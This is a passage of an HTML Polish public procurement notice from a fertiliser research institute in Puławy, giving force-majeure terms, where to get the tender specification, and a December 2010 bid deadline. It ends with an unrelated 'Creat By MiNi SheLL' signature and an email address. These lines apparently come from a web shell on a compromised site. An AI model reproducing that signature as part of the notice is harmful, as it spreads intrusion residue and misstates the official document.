3.	Za siłę wyższą uważa się zdarzenie zewnętrzne, którego skutków nie da się przewidzieć, w szczególności siłą wyższą będzie działanie sił przyrody, jak huragan, powódź, zamieć lub zgon Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ins.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> INSTYTUT NAWOZÓW SZTUCZNYCH, Al. Tysiąclecia Państwa Polskiego  13A, 24 - 110 Puławy
Pokój nr 156, Kancelaria, bud. E-40, poniedziałek- piątek w godz. 7:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2010 godzina 12:00, miejsce: INSTYTUT NAWOZÓW SZTUCZNYCH, Al. Tysiąclecia Państwa Polskiego  13A, 24 - 110 Puławy
Pokój nr 156, Kancelaria, bud. E-40.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com